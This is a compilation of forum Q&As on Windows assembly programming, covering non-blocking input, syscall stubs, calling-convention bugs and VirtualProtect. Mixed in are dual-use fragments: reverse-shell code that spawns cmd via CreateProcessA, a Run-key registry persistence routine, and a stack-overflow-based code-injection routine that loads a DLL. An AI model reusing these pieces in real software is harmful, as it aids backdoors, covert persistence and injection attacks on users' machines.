Non-blocking keyboard input x64 windows assembly / c++ - windows

I need a code in windows x64 assembly that would either:
a) Read data from user keyboard(stdin) in a non blocking way.
b) The way to check if there is data so I know if i should invoke readFile already or skip this step
c) Fix to the implementation I made so far
So far i tried the function PeekNamedPipe but it just doesnt seem to work. Here is the code I have so far:
mov rcx, dword -10
sub rsp, 28h
call GetStdHandle
add rsp, 28h
mov [std_in_handle], rax
sub rsp, 30h
mov rcx, qword [std_in_handle]
mov rdx, qword 0
mov r8d, dword 0
mov r9, qword 0
mov qword [rsp+0x20], bytes_available
mov qword [rsp+0x28], 0
call PeekNamedPipe
add rsp, 30h
cmp dword [bytes_available], dword 0
je .skip_reading_input
sub rsp, 28h
mov rcx, qword [std_in_handle]
mov rdx, qword input_char
mov r8d, dword 1
mov r9, qword BytesRead
mov qword [rsp+0x20], 0
call ReadFile
add rsp, 28h
The thing is that value in bytes_available is always 0 even if i type something on the keyboard, so readfile is always skipped.

I managed to somehow solve my particular problem using this function
extern GetAsyncKeyState
it has options to return given value when the key is pressed OR when it was pressed since last call to the function - so I call this function once at the beginning of the program and then check if it has been called since that time. However there is number of issues when using this approach so I will check the ones that others suggested soon and will maybe post better solution.


when writing 64bit reverse shell in assembly got stuck at createrprocessA api

hello i am writing windows 64bit reverse shell in assembly and after gett connected to the targetmachine ip, i want to create process to spwan a shell, fistly i try to write startinfo struct for createprocess api, but after then i pass all the parameters to the function but it doesn't work, and here is full code
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop rcx ; Set ECX for the loop
xor r11,r11
push r11 ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r14 ; HANDLE hStdInput;
mov [r12+0x58],r14 ; HANDLE hStdOutput;
mov [r12+0x60],r14 ;HANDLE hStdError;
sub rsp, 0x70
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx ;createprocessA
so at last when i call the createprocessA it got stuck

How to get Windows system calls assembly statically?

I am trying to find a specific pattern in the Windows system calls, for research purposes.
So far i've been looking into the Windows dlls such as ntdll.dll, user32.dll, etc., but those seem to contain only wrapper codes for preparing to jump to the system call. For example:
mov eax, 101Eh
lea edx, [esp+arg_0]
mov ecx, 0
call large dword ptr fs:0C0h
retn 10h
I'm guessing the call large dword ptr fs:0C0h instruction is another gateway in the chain that finally leads to the actual assembly, but I was wondering if I can get to that assembly directly.
You're looking in the wrong dlls. The system calls are in ntoskrnl.exe.
If you look at NtOpenFile() in ntoskrnl.exe you'll see:
mov r11, rsp
sub rsp, 88h
mov eax, [rsp+88h+arg_28]
xor r10d, r10d
mov [r11-10h], r10
mov [rsp+88h+var_18], 20h ; int
mov [r11-20h], r10d
mov [r11-28h], r10
mov [r11-30h], r10d
mov [r11-38h], r10d
mov [r11-40h], r10
mov [rsp+88h+var_48], eax ; int
mov eax, [rsp+88h+arg_20]
mov [rsp+88h+var_50], 1 ; int
mov [rsp+88h+var_58], eax ; int
mov [r11-60h], r10d
mov [r11-68h], r10
call IopCreateFile
add rsp, 88h
Which is the true body of the function. Most of the work is done in IopCreateFile(), but you can follow it statically and do whatever analysis you need.

How to set a value in the Windows registry in assembly language?

Ok. So I have this program that attempts to create a value in the Windows registry. Unfortunately, nothing happens. I have been trying to figure out if any of the parameters are wrong. Here is the code:
includelib \Masm64\Lib\Kernel32.lib
includelib \Masm64\Lib\Advapi32.lib
extern RegOpenKeyExA : proc
extern RegSetValueExA : proc
extern ExitProcess : proc
dseg segment para 'DATA'
vlnm db 'Startup', 0
sbky db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
phkr dd 0
path db 'C:\Users\School\AppData\Roaming\Startups.exe', 0
dseg ends
cseg segment para 'CODE'
start proc
lea rdx, [phkr]
push rdx
sub rsp, 28h
mov r9d, 2
xor r8d, r8d
lea rdx, [sbky]
mov ecx, 80000001h
call RegOpenKeyExA
add rsp, 28h
push 45
lea rbx, [path]
push rbx
sub rsp, 28h
mov r9d, 1
xor r8d, r8d
lea rdx, [vlnm]
mov ecx, phkr
call RegSetValueExA
call ExitProcess
start endp
cseg ends
Any suggestions?
Allow me to answer my own question. The problem does not truly concern incorrect parameters, but a mistake that I made allocating stack space. Whereas I was expected to allocate 20h of stack space for rcx, rdx, r8, and r9, and align the return address on a 16-byte boundary, I had mistakenly created a template as follows:
*empty* (rsp-8)
param2 (rsp-16)
param1 (rsp-24)
*empty* (rsp-32... causes incorrect parameters and convention!)
space for r9 (rsp-40)
space for r8 (rsp-48)
space for rdx (rsp-56)
space for rcx (rsp-64)
return address (rsp-72... not on a 16-byte boundary!)
The correct template would be
*empty* (rsp-8)
param2 (rsp-16)
param1 (rsp-24)
space for r9 (rsp-32)
space for r8 (rsp-40)
space for rdx (rsp-48)
space for rcx (rsp-56)
return address (rsp-64)
I had unintentionally allocated an extra 8 bytes between the stack parameters and register parameters, before the RegSetValueEx call, thus supplying an incorrect parameter. Here is the correct code:
includelib \Masm64\Lib\Kernel32.lib
includelib \Masm64\Lib\Advapi32.lib
extern RegOpenKeyExA : proc
extern RegSetValueExA : proc
extern ExitProcess : proc
dseg segment para 'DATA'
vlnm db 'Startup', 0
sbky db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
phkr dd 0
path db 'C:\Users\Games\AppData\Roaming\Startups.exe', 0
dseg ends
cseg segment para 'CODE'
start proc
lea rdx, [phky]
push rdx
sub rsp, 20h
mov r9d, 2
xor r8d, r8d
lea rdx, [sbky]
mov ecx, 80000001h
call RegOpenKeyExA
add rsp, 20h
push 44
lea rbx, [path]
push rbx
sub rsp, 20h
mov r9d, 1
xor r8, r8
lea rdx, [vlnm]
mov ecx, phkr
call RegSetValueExA
fini: call ExitProcess
start endp
cseg ends
You're only allocating 2 bytes for your key (phkr dw 0). It seems to me like it should be at least 4 bytes.
Apart from that, I suggest that you add some error checks. Both RegOpenKeyEx and RegSetValueEx return non-zero error codes if they fail.

x64 asm ret lands in no mans land

I assumed I had push'ed something without popping it, or vice versa, but I can't find anything wrong! I write to the console with a call to a dll that links properly, and I inexplicably am in no mans land... (address 0x0000000000000000)
I've put some sleeps in, and I'm sure that the api call WriteConsoleA is returning. It's on my last ret under the print function.
Any ideas?
extern FreeConsole
extern Sleep
extern ExitProcess
extern print
extern newconsole
extern strlen
section .data BITS 64
title: db 'Consolas!',0
message: db 'Hello, world',0,0
section .text bits 64
global Start
mov rcx, title
call newconsole
mov rcx, 1000
call Sleep
mov rcx, message
call print
mov rcx, 10000
call Sleep
call FreeConsole
xor rcx, rcx
call ExitProcess
extern AllocConsole
extern SetConsoleTitleA
extern GetStdHandle
extern WriteConsoleA
extern Sleep
export newconsole
export strlen
export print
section .data BITS 64
console.writehandle: dq 0
console.readhandle: dq 0
console.write.result: dq 0
section .text BITS 64
global strlen
push rax
push rdx
push rdi
mov rdi, rcx
xor rax, rax
mov rcx, dword -1
repnz scasb
neg rcx
sub rcx, 2
pop rdi
pop rdx
pop rax
global print
mov rbp, rsp
push rcx
call strlen
mov r8, rcx
pop rdx
mov rcx, [console.writehandle]
mov r9, console.write.result
push qword 0
call WriteConsoleA
global newconsole
push rax
push rcx
call AllocConsole
pop rcx
call SetConsoleTitleA
mov rcx, -11
call GetStdHandle
mov [console.writehandle], rax
pop rax
I assume you're talking about this function:
global print
mov rbp, rsp
push rcx
call strlen
mov r8, rcx
pop rdx
mov rcx, [console.writehandle]
mov r9, console.write.result
push qword 0
call WriteConsoleA
The x64 ABI requires that stack space is reserved even for parameters passed in registers. WriteConsoleA is free to use those stack locations for whatever it wants - so you need to make sure that you've adjusted the stack appropriately. As it stands, you're pushing only the last reserved pointer parameter. I think something like the following will do the trick for you:
push qword 0
sub rsp, 4 * 8 // reserve stack for register parameters
call WriteConsoleA
mov rsp, rbp // restore rsp
See (emphasis added):
The x64 Application Binary Interface (ABI) is a 4 register fast-call calling convention, with stack-backing for those registers.
The caller is responsible for allocating space for parameters to the callee, and must always allocate sufficient space for the 4 register parameters, even if the callee doesn’t have that many parameters.
According to calling convention, you have to clean up arguments you put on the stack. In this case that applies to the 5th argument to WriteConsoleA. Since you have a copy of original rsp in rbp, you can reload rsp from rbp, or just add 8 after the call.

Self modifying algorithms with Virtualprotect problems

I'm having problems with the Virtualprotect() api by windows.
I got an assignment from school, my teacher told us that in the past when memory was scarce and costly. Programmers had to create advanced algorithms that would modify itself on the fly to save memory. So there you have it, we must now write such an algorithm, it doesn't have to be effective but it must modify itself.
So I set out to do just that, and I think that I made it pretty far before asking for any help.
My program works like this:
I have a function and a loop with a built-in stack overflow. The stack gets overflown with the address of a memory location where code resides that is constructed during the loop. Control is passed to the code in memory. The code loads a dll and then exits, but before it exits it has to repair the loop. It is one of the conditions of our assignment, everything changed in the original loop must be restored.
The problem is that I don't have write access to the loop, only READ_EXECUTE, so to change my access I thought, I use virtualprotect. But that function returned an error:
ERROR_NOACCESS, the documentation on this error is very slim, windows only says: Invailid access to memory address. Which figures since I wanted to change the access in the first place. So what's wrong? Here's the code constructed in memory:
The names of all the data in my code is a little vague, so I provided a few comments
TrapData proc
jmp pLocals
LocalDllName db 100 dup(?) ; name of the dll to be called ebx-82h
RestoreBuffer db 5 dup(?) ; previous bytes at the overflow location
LoadAddress dd 0h ; ebx - 19h ; address to kernel32.loadlibrary
RestoreAddress dd 0h ; ebx - 15h ; address to restore (with the restore buffer)
AddressToRestoreBuffer dd 0h ; ebx - 11h ; obsolete, I don't use this one
AddressToLea dd 0h ; ebx - 0Dh Changed, address to kernel32.virutalprotect
AddressToReturnTo dd 0h ; ebx - 9h address to return execution to(the same as RestoreAddress
call Refpnt
Refpnt: pop ebx ; get current address in ebx
push ebx
mov eax, ebx
sub ebx, 82h
push ebx ; dll name
sub eax, 19h ; load lib address
mov eax, [eax]
call eax
pop ebx ; Current address
push ebx
;BOOL WINAPI VirtualProtect(
; __in LPVOID lpAddress,
; __in SIZE_T dwSize,
; __in DWORD flNewProtect,
; __out PDWORD lpflOldProtect
mov eax, ebx
mov esi, ebx
sub eax, 82h
push eax ; overwrite the buffer containing the dll name, we don't need it anymore
push 5h
sub esi, 15h
mov esi, [esi]
push esi
sub ebx, 0Dh
mov ebx, [ebx]
call ebx ; Returns error 998 ERROR_NOACCESS (to what?)
pop ebx
push ebx
sub ebx, 1Eh
mov eax, ebx ; restore address buffer pointer
pop ebx
push ebx
sub ebx, 15h ; Restore Address
mov ebx, [ebx]
xor esi, esi ; counter to 0
push eax
mov al, byte ptr[eax+esi]
mov byte ptr[ebx+esi], al
pop eax
inc esi
cmp esi, 5
jne #0
pop ebx
sub ebx, 9h
mov ebx, [ebx]
push ebx ; address to return to
So what's wrong?
Can you guys help me?
EDIT, Working code:
jmp pLocals
LocalDllName db 100 dup(?)
RestoreBuffer db 5 dup(?)
LoadAddress dd 0h ; ebx - 19h
RestoreAddress dd 0h ; ebx - 15h
AddressToRestoreBuffer dd 0h ; ebx - 11h
AddressToLea dd 0h ; ebx - 0Dh
AddressToReturnTo dd 0h ; ebx - 9h
call Refpnt
Refpnt: pop ebx ; get current address in ebx
push ebx
mov eax, ebx
sub ebx, 82h
push ebx ; dll name
sub eax, 19h ; load lib address
mov eax, [eax]
call eax
pop ebx ; Current address
push ebx
;BOOL WINAPI VirtualProtect(
; __in LPVOID lpAddress,
; __in SIZE_T dwSize,
; __in DWORD flNewProtect,
; __out PDWORD lpflOldProtect
mov esi, ebx
push 0
push esp
push 5h
sub esi, 15h
mov esi, [esi]
push esi
sub ebx, 0Dh
mov ebx, [ebx]
call ebx
pop ebx
pop ebx
push ebx
sub ebx, 1Eh
mov eax, ebx ; restore address buffer pointer
pop ebx
push ebx
sub ebx, 15h ; Restore Address
mov ebx, [ebx]
xor esi, esi ; counter to 0
push eax
mov al, byte ptr[eax+esi]
mov byte ptr[ebx+esi], al
pop eax
inc esi
cmp esi, 5
jne #0
pop ebx
sub ebx, 9h
mov ebx, [ebx]
push ebx ; address to return to
Maybe a little sloppy, but I that doesn't mater ;)
You are trying to make VirtualProtect write lpflOldProtect to a read-only memory location, i.e. your current code section which is what you're trying to unprotect in the first place! My guess is this is what gives you the ERROR_NO_ACCESS. Since you're using the stack anyway, have it write lpflOldProtect to a stack location.
This isn't nearly as easy as it was in the old days; read access used to imply execute access, and a lot of memory mappings were mapped writable.
These days, I'd be surprised if there are many (any?) memory mappings that are both writable and executable. (And modern CPUs with PAE support are sufficient for even 32-bit kernels to provide non-executable-yet-readable mappings.)
I'd say, first things first, find an older Windows system, Win2k or earlier, then start trying to tackle this problem. :)
EDIT: Oh! I thought loading the DLL failed. Good work. :)
What do you mean by 'restore the loop'? Since you smashed the stack to jump to your code, you didn't really destroy the loop's text segment, you only scribbled on the stack. You could insert another function before your loop, then return from your dll to the function that called your loop. (You 'returned' into your injected code from the loop, so you can't return into the loop without building a fake stack frame for it; returning to the previous function seems easier than building a fake stack frame.)
